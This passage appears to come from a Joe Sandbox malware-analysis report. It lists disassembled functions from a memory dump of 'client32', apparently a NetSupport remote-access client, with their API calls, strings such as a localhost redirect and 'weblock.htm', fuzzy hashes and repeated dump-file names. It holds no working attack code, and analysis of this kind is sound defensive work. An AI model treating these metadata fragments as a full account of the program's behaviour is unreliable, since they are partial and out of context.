Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
String ID: ..\CTL32\pcibmp.cpp$nColors
API String ID: 2713834284-4292231205
Opcode ID: 45dc7aa853aecb5747f13ceb53fd78dc266300ae9ca94bf324f49abcef6dcf0d
Instruction ID: fed9dfb2ea0db9ddf34779af1484dbee49448bc6ee14c4e39e325ca65f6a5934
Opcode Fuzzy Hash: 45dc7aa853aecb5747f13ceb53fd78dc266300ae9ca94bf324f49abcef6dcf0d
Instruction Fuzzy Hash: 2BE04827B4137937E51165AA6C81FCBFB8C9B957A8F010032FB04FB282D5D16D5047D1

Function 1101D100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D12F
ShowWindow.USER32(00000000), ref: 1101D136

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D116
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D111

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1

Function 1101D0B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D0DB
EnableWindow.USER32(00000000,?), ref: 1101D0E6

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D0C6
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D0C1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1

Function 1108D770 Relevance: 6.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 1106D060: EnterCriticalSection.KERNEL32(?,CF3D35D0,?,?,?), ref: 1106D0E2
Part of subcall function 1106D060: SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2

CloseHandle.KERNEL32(00000000,00000001,000000C2,?,00000001,000000C1,?,00000001,000000C0,?,00000001,00000093,?,00000001,00000091,?), ref: 1108D8FA
_free.LIBCMT ref: 1108D91B
CloseHandle.KERNEL32(?), ref: 1108D956
FreeLibrary.KERNEL32(?), ref: 1108D976

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalEnterEventFreeLibrarySection_free
String ID:
API String ID: 3241181375-0
Opcode ID: 4f6a1e918902b8adaa55ed995ad9aaf8e327a7bf1ad0e4c6b1b29103c1cdf2e9
Instruction ID: 62512875f02bf1513ee3f79acd051cde12c0f650fe06ea8ae4cf26c666d6d1d3
Opcode Fuzzy Hash: 4f6a1e918902b8adaa55ed995ad9aaf8e327a7bf1ad0e4c6b1b29103c1cdf2e9
Instruction Fuzzy Hash: 9D51E1B8BC434A36F52596214CD6FBE614E8B84BCCF044414F7956F2C2CED6BD929325

Function 110351A0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 11035277
__CxxThrowException@8.LIBCMT ref: 1103528C
std::exception::exception.LIBCMT ref: 1103529B
__CxxThrowException@8.LIBCMT ref: 110352B0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
String ID:
API String ID: 959338265-0
Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91

Function 11175085 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
__isleadbyte_l.LIBCMT ref: 111750EC
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
Instruction ID: 460b63ceb136a055cb04312f44383bb8d9651ef64d988a6b12a47e6aec4ca511
Opcode Fuzzy Hash: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
Instruction Fuzzy Hash: 59310431A042C6EFDB42DF64CD80AAEBFB5FF01315F168569E4658B291E731DA80CB91

Function 110A72F0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 110A7319
CreateRectRgn.GDI32(?,?,?,?), ref: 110A737B
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 110A7388
DeleteObject.GDI32(00000000), ref: 110A738F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateRect$CombineDeleteObject
String ID:
API String ID: 1735589438-0
Opcode ID: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
Instruction ID: 7c55b913b2b2c5e9ceebf247f0e200ebac5932dc0e21f1d57c3ddac5f96fd2c0
Opcode Fuzzy Hash: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
Instruction Fuzzy Hash: 6F219236A00119ABCB04DBA9D884CBFB7BAEFC9710711C199FA46D3254E6309D42D7E1

Function 110CD2A0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,CF3D35D0,?,?,?,CF3D35D0), ref: 110CCA4A
Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,CF3D35D0), ref: 110CCAB2

IsWindow.USER32(?), ref: 110CD2FB

Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9

RemovePropA.USER32(?), ref: 110CD328
DeleteObject.GDI32(?), ref: 110CD33C
DeleteObject.GDI32(?), ref: 110CD346

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
String ID:
API String ID: 3515130325-0
Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90

Function 11063510 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

FindWindowA.USER32(?,00000000), ref: 1106352E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 8265c7733af96d4dda88c0ddade548804898b919ac610bc4d1eb58f025c4b91a
Instruction ID: e8329917378a6b87ca437673dd5b043a6dbca1648499038e9eb5cae08ecf1174
Opcode Fuzzy Hash: 8265c7733af96d4dda88c0ddade548804898b919ac610bc4d1eb58f025c4b91a
Instruction Fuzzy Hash: 5521A675E4122DABD750CF58E885BDEF7F4EB49314F1041E9EA0997281DB30AA44CBD0

Function 110590DC Relevance: 6.1, APIs: 4, Instructions: 72timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 110590FC
LeaveCriticalSection.KERNEL32(?), ref: 110591AA
EnterCriticalSection.KERNEL32(?), ref: 110591C4
LeaveCriticalSection.KERNEL32(?), ref: 110591E9

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterTimetime
String ID:
API String ID: 1178526778-0
Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0

Function 1103D0B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1

Strings

:%u, xrefs: 1103D13F
/weblock.htm, xrefs: 1103D14D
redirect:http://127.0.0.1, xrefs: 1103D12D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

